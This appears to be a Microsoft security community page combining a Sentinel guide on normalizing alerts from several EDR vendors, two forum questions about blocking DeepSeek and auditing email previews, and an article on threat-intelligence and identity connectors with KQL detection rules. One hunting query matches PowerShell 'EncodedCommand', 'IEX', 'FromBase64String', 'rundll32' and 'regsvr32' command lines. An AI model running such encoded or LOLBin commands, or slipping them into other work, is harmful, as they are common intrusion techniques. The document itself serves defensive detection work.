| extend IngestDelayMin = datetime_diff("minute", now(), LastEvent)
| order by IngestDelayMin desc

// Schema discovery (run after onboarding and after connector updates)
<CiscoTable> | take 1 | getschema
<WithSecureTable> | take 1 | getschema
<KnoxTable> | take 1 | getschema
<LookoutTable> | take 1 | getschema

3. Normalization: make detections vendor-agnostic
The most common failure mode in multi-EDR SOCs is writing separate rules per vendor. Instead, build one normalization function that outputs a stable schema.
Then write rules once. Recommended canonical fields:
Vendor, AlertId, EventTime, SeverityNormalized
DeviceName (canonical), AccountUpn (canonical), SourceIP
FileHash (when applicable), ThreatName/Category
CorrelationKey (stable join key such as DeviceName + FileHash or DeviceName + AlertId)

// Example NormalizeEndpoint() pattern. Replace the column_ifexists(...) mappings after running getschema.
let NormalizeEndpoint = () {
union isfuzzy=true
(
    Cisco
    | extend Vendor="Cisco"
    | extend DeviceName=tostring(column_ifexists("hostname","")),
             AccountUpn=tostring(column_ifexists("user","")),
             SourceIP=tostring(column_ifexists("ip","")),
             FileHash=tostring(column_ifexists("sha256","")),
             ThreatName=tostring(column_ifexists("threat_name","")),
             SeverityNormalized=tolower(tostring(column_ifexists("severity","")))
),
(
    WithSecure
    | extend Vendor="WithSecure"
    | extend DeviceName=tostring(column_ifexists("hostname","")),
             AccountUpn=tostring(column_ifexists("user","")),
             SourceIP=tostring(column_ifexists("ip","")),
             FileHash=tostring(column_ifexists("file_hash","")),
             ThreatName=tostring(column_ifexists("classification","")),
             SeverityNormalized=tolower(tostring(column_ifexists("risk_level","")))
),
(
    Knox
    | extend Vendor="Knox"
    | extend DeviceName=tostring(column_ifexists("device_id","")),
             AccountUpn=tostring(column_ifexists("user","")),
             SourceIP="",
             FileHash="",
             ThreatName=strcat("Device posture: ", tostring(column_ifexists("compliance_state",""))),
             SeverityNormalized=tolower(tostring(column_ifexists("risk","")))
),
(
    Lookout
    | extend Vendor="Lookout"
    | extend DeviceName=tostring(column_ifexists("device_id","")),
             AccountUpn=tostring(column_ifexists("user","")),
             SourceIP=tostring(column_ifexists("source_ip","")),
             FileHash="",
             ThreatName=tostring(column_ifexists("threat_type","")),
             SeverityNormalized=tolower(tostring(column_ifexists("risk_level","")))
)
| extend CorrelationKey = iff(isnotempty(FileHash), strcat(DeviceName, "|", FileHash), strcat(DeviceName, "|", ThreatName))
| project-reorder
TimeGenerated, Vendor, DeviceName, AccountUpn, SourceIP, FileHash, ThreatName, SeverityNormalized, CorrelationKey, *
};

4. Entity mapping and incident merging
Sentinel's incident experience improves dramatically when alerts include entity mapping. Map Host, Account, IP, and File (hash) where possible. Incident grouping should merge alerts by DeviceName and AccountUpn within a reasonable window (e.g., 6–24 hours) to avoid alert storms.

5. Correlation patterns that raise confidence
High-confidence detections come from confirmation across independent sensors. These patterns reduce false positives while catching real compromise chains.

5.1 Multi-vendor confirmation (two EDRs agree)

NormalizeEndpoint()
| where TimeGenerated > ago(24h)
| summarize Vendors=dcount(Vendor), VendorSet=make_set(Vendor, 10) by DeviceName
| where Vendors >= 2

5.2 Third-party detection confirmed by Defender process telemetry

let tp = NormalizeEndpoint()
| where TimeGenerated > ago(6h)
| where ThreatName has_any ("powershell","ransom","credential","exploit")
| project TPTime=TimeGenerated, DeviceName, AccountUpn, Vendor, ThreatName;
tp
| join kind=inner (
    DeviceProcessEvents
    | where Timestamp > ago(6h)
    | where ProcessCommandLine has_any ("EncodedCommand","IEX","FromBase64String","rundll32","regsvr32")
    | project MDETime=Timestamp, DeviceName=tostring(DeviceName), Proc=ProcessCommandLine
) on DeviceName
| where MDETime between (TPTime ..
TPTime + 30m)
| project TPTime, MDETime, DeviceName, Vendor, ThreatName, Proc

5.3 Mobile phishing signal followed by successful sign-in

let mobile = NormalizeEndpoint()
| where TimeGenerated > ago(24h)
| where Vendor == "Lookout" and ThreatName has "phish"
| project MTDTime=TimeGenerated, AccountUpn, DeviceName, SourceIP;
mobile
| join kind=inner (
    SigninLogs
    | where TimeGenerated > ago(24h)
    | where ResultType == "0"
    | project SigninTime=TimeGenerated, AccountUpn=tostring(UserPrincipalName), IPAddress, AppDisplayName
) on AccountUpn
| where SigninTime between (MTDTime .. MTDTime + 30m)
| project MTDTime, SigninTime, AccountUpn, DeviceName, SourceIP, IPAddress, AppDisplayName

5.4 Knox posture and high-risk sign-in

let noncompliant = NormalizeEndpoint()
| where TimeGenerated > ago(7d)
| where Vendor=="Knox" and ThreatName has "NonCompliant"
| project DeviceName, AccountUpn, KnoxTime=TimeGenerated;
noncompliant
| join kind=inner (
    SigninLogs
    | where TimeGenerated > ago(7d)
    | where RiskLevelDuringSignIn in ("high","medium")
    | project SigninTime=TimeGenerated, AccountUpn=tostring(UserPrincipalName), RiskLevelDuringSignIn, IPAddress
) on AccountUpn
| where SigninTime between (KnoxTime .. KnoxTime + 2h)
| project KnoxTime, SigninTime, AccountUpn, DeviceName, RiskLevelDuringSignIn, IPAddress

6. Response orchestration (SOAR) design
Response should be consistent across vendors. Use a scoring model to decide whether to isolate a device, revoke tokens, or enforce Conditional Access. Prefer reversible actions, and log every automation step for audit.
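The scoring model can be prototyped outside Sentinel before wiring up Logic Apps. A minimal Python sketch of severity-to-score gating; the weights, thresholds, and action names are illustrative assumptions, not a shipped playbook:

```python
# Hedged sketch: gate SOAR actions on an aggregate risk score per device/user.
# Severity weights mirror the article's scoring idea; thresholds are illustrative.
SEVERITY_SCORE = {"critical": 5, "high": 4, "medium": 2}

def risk_score(alerts):
    """Sum severity weights over a list of normalized alerts (default weight 1)."""
    return sum(SEVERITY_SCORE.get(a.get("severity", "").lower(), 1) for a in alerts)

def choose_playbook(alerts, high_threshold=8, medium_threshold=4):
    """Pick a reversible-first response tier from the aggregate score."""
    score = risk_score(alerts)
    if score >= high_threshold:
        return "isolate-revoke-block"   # isolate device, revoke tokens, CA block
    if score >= medium_threshold:
        return "tag-watchlist-notify"   # tag incident, watchlist, notify analysts
    return "log-only"

alerts = [{"severity": "high"}, {"severity": "medium"}, {"severity": "medium"}]
print(risk_score(alerts), choose_playbook(alerts))  # 8 isolate-revoke-block
```

Keeping the mapping in one table makes it easy to tune per environment and to keep the KQL and automation sides consistent.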
6.1 Risk scoring to gate playbooks

let SevScore = (s:string) { case(s=="critical",5, s=="high",4, s=="medium",2, 1) };
NormalizeEndpoint()
| where TimeGenerated > ago(24h)
| extend Score = SevScore(SeverityNormalized)
| summarize RiskScore=sum(Score), Alerts=count(), Vendors=make_set(Vendor, 10) by DeviceName, AccountUpn
| where RiskScore >= 8
| order by RiskScore desc

High-severity playbooks typically execute: (1) isolate the device via Defender (if onboarded), (2) revoke tokens in Entra ID, (3) trigger a Conditional Access block, (4) notify and open an ITSM ticket. Medium-severity playbooks usually tag the incident, add watchlist entries, and notify analysts.
Issues blocking DeepSeek
Hi all, I am investigating DeepSeek usage in our Microsoft security environment and have found inconsistent behaviour between Defender for Cloud Apps, Defender for Endpoint, and IOC controls. I am hoping to understand if others have seen the same.

Environment: full Microsoft security and management suite.

What we are seeing:

Defender for Cloud Apps
DeepSeek is classified as an Unsanctioned app. Cloud Discovery shows ongoing traffic and active usage. Multiple successful sessions and data activity are visible.

Defender for Endpoint Indicators
DeepSeek domains and URIs have been added as Indicators with the Block action. Indicators show as successfully applied.

Advanced Hunting and Device Timeline
Multiple executable processes are initiating connections to DeepSeek domains. Examples include Edge, Chrome, and other executables making outbound HTTPS connections. Connection status is a mix of Successful and Unsuccessful. No block events are recorded.

Settings
Network Protection enabled in block mode. Web Content Filtering enabled. SmartScreen enabled. File Hash Computation enabled. Network Protection reputation mode set to 1.

Has anyone else had similar issues when trying to block DeepSeek or other apps via the Microsoft security suite? I am currently working with Microsoft support on this but wanted to ask here as well.
Email Entity - Preview Email
Hello all, I want to ask if there is a way to monitor, and be alerted, when someone views an email from the email entity page by clicking "Email Preview". I couldn't find any documentation, and the action is not registered in any audit logs. Maybe I am missing something, so please feel free to share any info regarding this issue. I believe it can have a major impact if a disgruntled security employee chooses to leak info from private emails. Nick
Threat Intelligence & Identity Ecosystem Connectors
Microsoft Sentinel's capability can be greatly enhanced by integrating third-party threat intelligence (TI) feeds (e.g. GreyNoise, Team Cymru) with identity and access logs (e.g. OneLogin, PingOne). This article provides a deep dive into each connector, its data types, and best practices for enrichment and false-positive reduction. We cover how GreyNoise (including PureSignal/Scout), Team Cymru, OneLogin IAM, PingOne, and Keeper integrate with Sentinel – including available connectors, ingested schemas, and configuration. We then outline technical patterns for building TI-based lookup pipelines, scoring, and suppression rules to filter benign noise (e.g. GreyNoise's known scanners), and for enriching alerts with context from identity logs. We map attack chains (credential stuffing, lateral movement, account takeover) to Sentinel data, and propose KQL analytics rules and playbooks with MITRE ATT&CK mappings (e.g. T1110: Brute Force, T1595: Active Scanning). The report also includes guidance on deployment (ARM/Bicep examples), performance considerations for high-volume TI ingestion, and comparison tables of connector features. A mermaid flowchart illustrates the data flow from TI and identity sources into Sentinel analytics. All recommendations are drawn from official documentation and industry sources.

Threat Intel & Identity Connectors Overview

GreyNoise (TI Feed): GreyNoise provides "internet background noise" intelligence on IPs seen scanning or probing the Internet. The Sentinel GreyNoise Threat Intelligence connector (Azure Marketplace) pulls data via GreyNoise's API into Sentinel's ThreatIntelligenceIndicator table. It uses a daily Azure Function to fetch indicators (IP addresses and metadata like classification, noise, last_seen) and injects them as STIX-format indicators (network IPs with provider "GreyNoise"). This feed can then be queried in KQL. Authentication requires a GreyNoise API key and a Sentinel workspace app with Contributor rights.
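Conceptually, each run of that Azure Function reduces to mapping GreyNoise lookup records onto ThreatIntelligenceIndicator-style rows. A hedged Python sketch of the mapping; field names and the severity/TTL logic are illustrative, not the marketplace connector's actual code:

```python
# Hedged sketch: map a GreyNoise IP record to a ThreatIntelligenceIndicator-style row.
# Field names and severity/TTL choices are illustrative assumptions.
from datetime import datetime, timedelta, timezone

def to_indicator(record, ttl_days=7):
    """Convert one GreyNoise lookup result into a Sentinel TI row."""
    classification = record.get("classification", "unknown")
    return {
        "NetworkDestinationIP": record["ip"],
        "IndicatorProvider": "GreyNoise",
        "ThreatSeverity": 4 if classification == "malicious" else 1,
        "Description": f"GreyNoise {classification}; last seen {record.get('last_seen', 'n/a')}",
        # Expire indicators so stale scanner IPs do not linger in the workspace.
        "ExpirationDateTime": (datetime.now(timezone.utc) + timedelta(days=ttl_days)).isoformat(),
    }

row = to_indicator({"ip": "203.0.113.7", "classification": "malicious", "last_seen": "2025-01-02"})
print(row["ThreatSeverity"])  # 4
```

The key design point is stamping an expiry at ingestion time, so downstream suppression and matching rules never act on stale background-noise data.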
GreyNoise's goal is to help "filter out known opportunistic traffic" so analysts can focus on real threats. Official docs describe deploying the content pack and workbook template.

Ingested data: IP-based indicators (malicious vs. benign scans), classifications (noise, riot, etc.), organization names, last-seen dates. All fields from GreyNoise's IP lookup (e.g. classification, last_seen) map into ThreatIntelligenceIndicator (NetworkDestinationIP, IndicatorProvider="GreyNoise", and related fields). Query:

ThreatIntelligenceIndicator
| where IndicatorProvider == "GreyNoise"
| summarize arg_max(TimeGenerated, *) by NetworkDestinationIP

This yields the latest GreyNoise record per IP.

Team Cymru Scout (TI Context): Team Cymru's PureSignal™ Scout is a TI enrichment platform. The Team Cymru Scout connector (via Azure Marketplace) ingests contextual data (not raw logs) about IPs, domains, and account usage into Sentinel custom tables. It runs via an Azure Function that, given IP or domain inputs, populates tables such as Cymru_Scout_IP_Data_* and Cymru_Scout_Domain_Data_CL. For example, an IP query yields multiple tables: Cymru_Scout_IP_Data_Foundation_CL, ..._OpenPorts_CL, ..._PDNS_CL, etc., containing open ports, passive DNS history, X.509 certificate info, fingerprint data, and so on. This feed requires a Team Cymru account (username/password) to access the Scout API.

Data types: structured TI metadata by IP/domain. There is no native ThreatIndicator insertion; instead, analysts query these tables to enrich events (e.g. join on SourceIP). The Sentinel Tech Community notes that Scout "enriches alerts with real-time context on IPs, domains, and adversary infrastructure" and can help "reduce false positives".

OneLogin IAM (Identity Logs): The OneLogin IAM solution (Microsoft Sentinel content pack) ingests OneLogin platform events and user info via OneLogin's REST API.
Using the Codeless Connector Framework, it pulls from OneLogin's Events API and Users API, storing data in the custom tables OneLoginEventsV2_CL and OneLoginUsersV2_CL. Typical events include user sign-ins, MFA actions, app accesses, admin changes, etc. Prerequisites: create an OpenID Connect app in OneLogin (for a client ID/secret) and register it in Azure (Global Admin). The connector queries hourly (or on schedule), within OneLogin's rate limit of 5,000 calls/hour.

Data mapping: OneLoginEventsV2_CL (the _CL suffix indicates a custom log) holds event records (time, user, IP, event type, result, etc.); OneLoginUsersV2_CL contains user account attributes. These can be joined or used in analytics. For example, a query might look for failed login events:

OneLoginEventsV2_CL
| where Event_type_s == "UserSessionStart" and Result_s == "Failed"

(Actual field names depend on the schema.)

PingOne (Identity Logs): The PingOne Audit connector ingests audit activity from the PingOne identity platform via its REST API. It creates the table PingOne_AuditActivitiesV2_CL, which includes administrator actions, user logins, console events, etc. You configure a PingOne API client (client ID/secret) and set up the Codeless Connector Framework. Logs are retrieved (with attention to PingOne's license-based rate limits) and appended to the custom table. Analysts can query, for instance, PingOne_AuditActivitiesV2_CL for events like MFA failures or profile changes.

Keeper (Password Vault Logs – optional): Keeper, a password management platform, can forward security events to Sentinel via Azure Monitor. As of the latest docs, logs are sent to a custom log table (commonly KeeperLogs_CL) using Azure Data Collection Rules. In Keeper's guide, you register an Azure AD app ("KeeperLogging") and configure Azure Monitor data collection; then in the Keeper Admin Console you specify the DCR endpoint. Keeper events (e.g. user logins, vault actions, admin changes) are ingested into the table named (e.g.)
Custom-KeeperLogs_CL. Authentication uses the app's client ID/secret and a monitor endpoint URL. This is a bulk ingest of records rather than a scheduled pull. Data ingested: custom Keeper events with fields like user, action, timestamp. Keeper's integration is essentially via Azure Monitor (in the older Azure Sentinel approach).

Connector Configuration & Data Ingestion

Authentication and Rate Limits: Most connectors require API keys or OAuth credentials. GreyNoise and Team Cymru use single keys/credentials, with the Azure Function secured by a managed identity. OneLogin and PingOne use a client ID/secret and must respect their API limits (OneLogin ~5k calls/hour; PingOne depends on licensing). GreyNoise's enterprise API allows bulk lookups; the community API is limited (10/day for free), so production integration requires an Enterprise plan.

Sentinel Tables: Data is inserted either into built-in tables or custom tables. GreyNoise feeds the ThreatIntelligenceIndicator table, populating fields like NetworkDestinationIP and ThreatSeverity (higher if classified "malicious"). Team Cymru's Scout connector creates many Cymru_Scout_*_CL tables. OneLogin's solution populates OneLoginEventsV2_CL and OneLoginUsersV2_CL. PingOne yields PingOne_AuditActivitiesV2_CL. Keeper logs appear in a custom table (e.g. KeeperLogs_CL) as shown in Keeper's guide. Note: Sentinel's built-in identity tables (IdentityInfo, SigninLogs) are typically for Microsoft identities; third-party logs can be mapped to them via parsers or custom analytics rules but by default arrive in these custom tables.

Data Types & Schema:
Threat Indicators: In ThreatIntelligenceIndicator, GreyNoise IPs appear as NetworkDestinationIP with associated fields (e.g. ThreatSeverity, IndicatorProvider="GreyNoise", ConfidenceScore). (Future STIX tables may be used after 2025.)
Custom CL Logs: OneLogin events may include fields such as user_id_s, user_login_s, client_ip_s, event_time, etc.
(The published parser issues indicate fields like app_name_s, role_id_d, etc.) PingOne logs include eventType, user, clientIP, result. Keeper logs contain Action, UserName, etc. These raw fields can be normalized in analytics rules or parsed via data transformations.
Identity Info: Although not directly ingested, identity attributes from OneLogin/PingOne (e.g. user roles, group IDs) could be periodically fetched and synced to Sentinel (via custom logic) to populate IdentityInfo records, aiding user-centric hunts.

Configuration Steps:

GreyNoise: In the Sentinel Content Hub, install the GreyNoise ThreatIntel solution. Enter your GreyNoise API key when prompted. The solution deploys an Azure Function (requires write access to Functions) and sets up an ingestion schedule. Verify that the ThreatIntelligenceIndicator table is receiving GreyNoise entries.

Team Cymru: From the Marketplace, install "Team Cymru Scout" and provide Scout credentials. The solution creates an Azure Function app and defines a workflow to ingest or look up IPs/domains. (Often, analysts trigger lookups rather than scheduled ingestion, since Scout is lookup-based.) Ensure roles: the Function's managed identity needs Sentinel contributor rights.

OneLogin: Use the Data Connectors UI. Authenticate OneLogin by creating a new Sentinel web API authentication (with OneLogin's client ID/secret). Enable both "OneLogin Events" and "OneLogin Users". No agent is needed. After setup, data flows into OneLoginEventsV2_CL.

PingOne: Similarly, configure the PingOne connector. Use the PingOne administrative console to register an OAuth client. In Sentinel's connector blade, enter the client ID/secret and specify the desired log types (Audit, possibly IdP logs). Confirm that PingOne_AuditActivitiesV2_CL populates hourly.

Keeper: Register an Azure AD app ("KeeperLogging") and assign it Monitoring roles (Publisher/Contributor) on your workspace and data collection endpoint. Create an Azure Data Collection Rule (DCR) and table (e.g. KeeperLogs_CL).
In Keeper's Admin Console (Reporting & Alerts → Azure Monitor), enter the tenant ID, client ID/secret, and the DCR endpoint URL (format: https://<DCE>/dataCollectionRules/<DCR_ID>/streams/<table>?api-version=2023-01-01). Keeper will then push logs.

KQL Lookup: To enrich a Sentinel event with these feeds, you might write:

OneLoginEventsV2_CL
| where EventType == "UserLogin" and Result == "Success"
| extend UserIP = ClientIP_s
| join kind=inner (
    ThreatIntelligenceIndicator
    | where IndicatorProvider == "GreyNoise" and ThreatSeverity >= 3
    | project NetworkDestinationIP, Category
) on $left.UserIP == $right.NetworkDestinationIP

This joins OneLogin sign-ins with GreyNoise's list of malicious scanners.

Enrichment & False-Positive Reduction

IOC Enrichment Pipelines: A robust TI pipeline in Sentinel often uses lookup tables and functions. For example, ingested TI (from GreyNoise or Team Cymru) can be stored in reference data or scheduled lookup tables to enrich incoming logs. Patterns include:
- Normalization: Normalize diverse feeds into common STIX schema fields (e.g. all IPs to NetworkDestinationIP, all domains to DomainName) so rules can treat them uniformly.
- Confidence Scoring: Assign a confidence score to each indicator (from the vendor, or based on recency/frequency). For GreyNoise, for instance, you might use classification (e.g. "malicious" vs. "benign") and history to score IP reputation. In Sentinel's ThreatIntelligenceIndicator.ConfidenceScore field you can set values (higher for high-confidence IOCs, lower for noisy ones).
- TTL & Freshness: Some indicators (e.g. active C2 domains) expire, so setting a time-to-live is critical. Sentinel ingestion rules or parsers should use ExpirationDateTime or ValidUntil on indicators to avoid stale IOCs. For example, extend ValidUntil only if confidence is high.
- Conflict Resolution: When the same IOC comes from multiple sources (e.g.
an IP in both GreyNoise and Team Cymru), you can either merge metadata or choose the highest confidence. One approach: use the highest threat severity from any source. Sentinel's ThreatType tags (e.g. malicious-traffic) can accommodate multiple providers.

False-Positive Reduction Techniques:
- GreyNoise Noise Scoring: GreyNoise's primary utility is filtering. If an IP is labeled noise=true (i.e. just scanning, not actively malicious), rules can deprioritize alerts involving that IP, e.g. suppress an alert if its source IP appears in GreyNoise as a benign scanner.
- Team Cymru Reputation: Use Scout data to gauge risk; e.g. if an IP's open-port fingerprint or domain history shows no malicious tags, it may be low-risk. Conversely, a known hostile IP (e.g. seen in ransomware networks) should raise the alert level. Scout's thousands of context tags help refine a binary IOC.
- Contextual Identity Signals: Leverage OneLogin/PingOne context to filter alerts. For instance, if a sign-in event is associated with a high-risk location (e.g. a new country) and the IP is a GreyNoise scan, flag it. If an IP is marked benign, drop or suppress. Correlate login failures: if a single IP causes many failures across multiple users, it might be credential stuffing (T1110); but if that IP is a known benign scanner, consider it low priority.
- Thresholding & Suppression: Build analytic suppression rules. Example: only alert on >5 failed logins in 5 minutes from an IP where that IP is not noise. Or ignore DNS queries to domains that TI flags as benign/whitelisted. Apply tag-based rules: some connectors allow tagging known internal assets or trusted scan ranges to avoid alerts.
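The conflict-resolution and TTL patterns above reduce to a small merge routine: collapse per-feed rows for one IOC, keep the highest severity, and keep the freshest expiry. A hedged Python sketch; the feed names and field names are illustrative:

```python
# Hedged sketch: merge the same IOC from multiple TI feeds, keeping the
# highest severity and the latest validity date. Field names are illustrative.
def merge_indicators(indicators):
    """Collapse per-feed rows for each IOC into a single enriched record."""
    merged = {}
    for ind in indicators:
        key = ind["ioc"]
        cur = merged.setdefault(key, {"ioc": key, "providers": [], "severity": 0, "valid_until": ""})
        cur["providers"].append(ind["provider"])
        cur["severity"] = max(cur["severity"], ind["severity"])       # highest wins
        cur["valid_until"] = max(cur["valid_until"], ind["valid_until"])  # freshest wins
    return merged

feeds = [
    {"ioc": "198.51.100.9", "provider": "GreyNoise", "severity": 1, "valid_until": "2025-06-01"},
    {"ioc": "198.51.100.9", "provider": "TeamCymru", "severity": 4, "valid_until": "2025-07-01"},
]
m = merge_indicators(feeds)["198.51.100.9"]
print(m["severity"], m["valid_until"])  # 4 2025-07-01
```

Keeping all contributing providers on the merged record preserves provenance for analysts while the "highest severity wins" rule drives alert logic.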
Use GreyNoise to suppress alerts:

SecurityEvent
| where EventID == 4625 and Account != "SYSTEM"
| join kind=leftanti (
    ThreatIntelligenceIndicator
    | where IndicatorProvider == "GreyNoise" and Classification == "benign"
    | project NetworkSourceIP
) on $left.IPAddress == $right.NetworkSourceIP

This rule filters out Windows 4625 login failures originating from GreyNoise-known benign scanners.

Identity Attack Chains & Detection Rules

Modern account attacks often involve sequential activities. By combining identity logs with TI, we can detect advanced patterns. Below are common chains and rule ideas:

Credential Stuffing (MITRE T1110): Often seen as many login failures followed by a success. Detection: look for multiple failed OneLogin/PingOne sign-ins for the same or different accounts from a single IP, then a success. Enrich with GreyNoise: if the source IP is in GreyNoise (indicating scanning), raise severity. Rule:

let SuspiciousIP = OneLoginEventsV2_CL
| where EventType == "UserSessionStart" and Result == "Failed"
| summarize CountFailed=count() by ClientIP_s
| where CountFailed > 5;
OneLoginEventsV2_CL
| where EventType == "UserSessionStart" and Result == "Success" and ClientIP_s in (SuspiciousIP | project ClientIP_s)
| join kind=inner (
    ThreatIntelligenceIndicator
    | where ThreatType == "ip"
    | extend GreyNoiseClass = tostring(Classification)
    | project IP=NetworkSourceIP, GreyNoiseClass
) on $left.ClientIP_s == $right.IP
| where GreyNoiseClass == "malicious"
| project TimeGenerated, Account_s, ClientIP_s, GreyNoiseClass

Tactics: Initial Access (T1110) – Severity: High.

Account Takeover / Impossible Travel (T1078: Valid Accounts): Sign-ins from unusual geographies or devices. Detection: compare the user's current sign-in location against a historical baseline. Use OneLogin/PingOne logs: if two logins by the same user occur in different countries with insufficient time to travel, trigger. Enrich: if the login IP is also known infrastructure (Team Cymru PDNS, etc.), raise the alert.
Rule:

// Compare each login to the same user's previous login (prev() requires a serialized row set, which sort provides).
PingOne_AuditActivitiesV2_CL
| where EventType_s == "UserLogin"
| extend loc = strcat(tostring(City_s), ", ", tostring(Country_s))
| sort by User_s asc, TimeGenerated asc
| extend prevLoc = prev(loc), prevTime = prev(TimeGenerated), prevUser = prev(User_s)
| where User_s == prevUser and loc != prevLoc and TimeGenerated - prevTime < 1h
| project User_s, TimeGenerated, loc, prevLoc

(This query flags two different login locations for the same user within one hour.) Tactics: Initial Access – Severity: Medium.

Lateral Movement (T1021): Use of an account on multiple systems/apps. Detection: two or more distinct application/service authentications by the same user within a short time. Use OneLogin app-id fields or audit logs for access. If these are followed by suspicious network activity (e.g. contacting C2 infrastructure flagged by GreyNoise), escalate. Tactics: Lateral Movement – Severity: High.

Privilege Escalation (T1098: Account Manipulation): An admin account is changed or MFA factors are reset in OneLogin/PingOne, especially after an anomalous login. Detection: monitor OneLogin admin events ("User updated", "MFA enrolled/removed"). Cross-check the actor's IP against threat feeds. Tactics: Persistence / Privilege Escalation – Severity: High.

Analytics Rules (KQL)

Below are six illustrative Sentinel analytics rules combining TI and identity logs. Each rule shows logic, tactics, severity, and MITRE IDs. (Adjust field names per your schemas and normalize CL tables as needed.)

Multiple Failed Logins from Malicious Scanner (T1110) – High severity. Detect credential stuffing by identifying >5 failed login attempts from the same IP, where that IP is classified as malicious by GreyNoise.
let BadIP = OneLoginEventsV2_CL
| where EventType == "UserSessionStart" and Result == "Failed"
| summarize attempts=count() by SourceIP_s
| where attempts >= 5;
OneLoginEventsV2_CL
| where EventType == "UserSessionStart" and Result == "Success" and SourceIP_s in (BadIP | project SourceIP_s)
| join kind=inner (
    ThreatIntelligenceIndicator
    | where IndicatorProvider == "GreyNoise" and ThreatSeverity >= 4
    | project MaliciousIP=NetworkDestinationIP
) on $left.SourceIP_s == $right.MaliciousIP
| extend AttackFlow="CredentialStuffing", MITRE="T1110"
| project TimeGenerated, UserName_s, SourceIP_s, MaliciousIP

Logic: Correlate failed-then-successful logins from the same IP plus a GreyNoise "malicious" classification.

Impossible Travel / Anomalous Geo (T1078) – Medium severity. A user signs in from two distant locations within an hour.

// Compare each successful login to the user's previous one. Assumes the audit
// log exposes numeric latitude/longitude columns; adjust names to your schema.
PingOne_AuditActivitiesV2_CL
| where EventType_s == "UserLogin" and Outcome_s == "Success"
| sort by User_s asc, TimeGenerated asc
| extend prevLat = prev(Latitude_d), prevLon = prev(Longitude_d), prevTime = prev(TimeGenerated), prevUser = prev(User_s)
| where User_s == prevUser
| extend distKm = geo_distance_2points(Longitude_d, Latitude_d, prevLon, prevLat) / 1000.0
| where distKm > 1000 and TimeGenerated - prevTime < 1h
| extend MITRE="T1078"
| project TimeGenerated, User=User_s, distKm

Logic: Compute the geographic distance between consecutive logins; flag if too far, too fast. (geo_distance_2points takes longitude/latitude pairs and returns meters.)

Suspicious Admin Change (T1098) – High severity. Detect a change to admin settings (like a role assignment or MFA reset) via PingOne, from a high-risk IP (Team Cymru or GreyNoise) or after failed logins.
PingOne_AuditActivitiesV2_CL
| where EventType_s in ("UserMFAReset", "UserRoleChange") // example admin events
| extend ActorIP = tostring(InitiatingIP_s)
| join kind=inner (
    ThreatIntelligenceIndicator
    | where ThreatSeverity >= 3
    | project BadIP=NetworkDestinationIP
) on $left.ActorIP == $right.BadIP
| extend MITRE="T1098"
| project TimeGenerated, ActorUser_s, Action=EventType_s, ActorIP

Logic: Raise an alert if an admin action originates from a known-bad IP.

Malicious Domain Access (T1071: Application Layer Protocol) – Medium severity. Internal logs (e.g. DNS or web proxy) show access to a domain listed by Team Cymru Scout as C2 or reconnaissance infrastructure.

DeviceDnsEvents
| where QueryType == "A"
| join kind=inner (
    Cymru_Scout_Domain_Data_CL
    | where ThreatTag_s == "Command-and-Control"
    | project DomainName_s
) on $left.QueryText == $right.DomainName_s
| extend MITRE="T1071"
| project TimeGenerated, DeviceName, QueryText

Logic: Correlate internal DNS queries with Scout's flagged C2 domains. (Requires that the domain data is ingested or synced.)

Brute-Force Firewall Blocked IP (T1110) – Low to Medium severity. Firewall logs show an IP blocked for many attempts, and that IP is not noise per GreyNoise (i.e., not a benign scanner).

AzureDiagnostics
| where Category == "NetworkSecurityGroupFlowEvent" and msg_s contains "DIRECTION=Inbound" and Action_s == "Deny"
| summarize attemptCount=count() by IP = SourceIp_s, FlowTime=bin(TimeGenerated, 1h)
| where attemptCount > 50
| join kind=leftanti (
    ThreatIntelligenceIndicator
    | where IndicatorProvider == "GreyNoise" and Classification == "benign"
    | project NoiseIP=NetworkDestinationIP
) on $left.IP == $right.NoiseIP
| extend MITRE="T1110"
| project IP, attemptCount, FlowTime

Logic: Many inbound denies (possible brute force) from an IP not classified as benign by GreyNoise.

New Device Enrolled (T1078) – Low severity. A user enrolls a new device or location for MFA after an unusual login.
OneLoginEventsV2_CL
| where EventType == "NewDeviceEnrollment"
| join kind=inner (
    OneLoginEventsV2_CL
    | where EventType == "UserSessionStart" and Result == "Success"
    | summarize arg_max(TimeGenerated, ClientIP_s) by User_s // most recent successful login per user
    | project User_s, loginTime=TimeGenerated, loginIP=ClientIP_s
) on User_s
| where loginIP != DeviceIP_s
| extend MITRE="T1078"
| project TimeGenerated, User_s, DeviceIP_s, loginIP
Logic: Flag when a new device is added from an IP that differs from the user's most recent login (possible account compromise).
Note: The above rules are illustrative. Tune threshold values (e.g. attempt counts) to your environment. Map the event fields (EventType, Result, etc.) to your actual schema. Use severity mapping in rule configs as indicated and tag with MITRE IDs for context.
TI-Driven Playbooks and Automation
Automated response can amplify TI. Patterns include:
- IOC Blocking: On alert (e.g. suspicious IP login), an automation runbook can call Azure Firewall, Azure Defender, or external firewall APIs to block the offending IP. For instance, a Logic App could trigger on the analytic alert, take the TI feed IP, and call Azure Firewall PowerShell (e.g. New-AzFirewallNetworkRule) to add a deny rule.
- Enrichment Workflow: After an alert triggers, an Azure Logic App playbook can enrich the incident by querying TI APIs. E.g., given an IP from the alert, call the GreyNoise API or Team Cymru Scout API in real time (via an HTTP action), add the classification to the incident details, and tag the incident accordingly (e.g. GreyNoiseStatus: malicious). This adds context for the analyst.
- Alert Suppression: Implement playbook-driven suppression. For example, an alert triggered by an external IP can invoke a playbook that checks GreyNoise; if the IP is benign, the playbook can auto-close the alert or mark it as a false positive, reducing analyst load.
- Automated TI Feed Updates: Periodically fetch open-source or commercial TI and use a playbook to push new indicators into Sentinel’s TI store via the Graph API.
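The alert-suppression pattern above boils down to a small decision function. A minimal Python sketch, assuming a GreyNoise-style benign/malicious/unknown classification string (the function name and action labels are illustrative, not part of any Sentinel or GreyNoise API):

```python
def triage_action(classification: str) -> str:
    """Map a GreyNoise-style classification to a playbook action.

    'benign'    -> auto-close the alert as a false positive
    'malicious' -> escalate for analyst attention
    anything else (unknown/missing) -> leave the alert open
    """
    c = (classification or "").strip().lower()
    if c == "benign":
        return "close_as_false_positive"
    if c == "malicious":
        return "escalate"
    return "leave_open"
```

A playbook would call this after the HTTP enrichment step and branch on the returned action; keeping the decision pure makes the suppression logic easy to unit-test outside the Logic App.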
- Incident Enrichment: On incident creation, a playbook could query OneLogin/PingOne for additional user details (like department or location via their APIs) and add them as a note in the incident.
Performance, Scalability & Costs
TI feeds and identity logs can be high-volume. Key considerations:
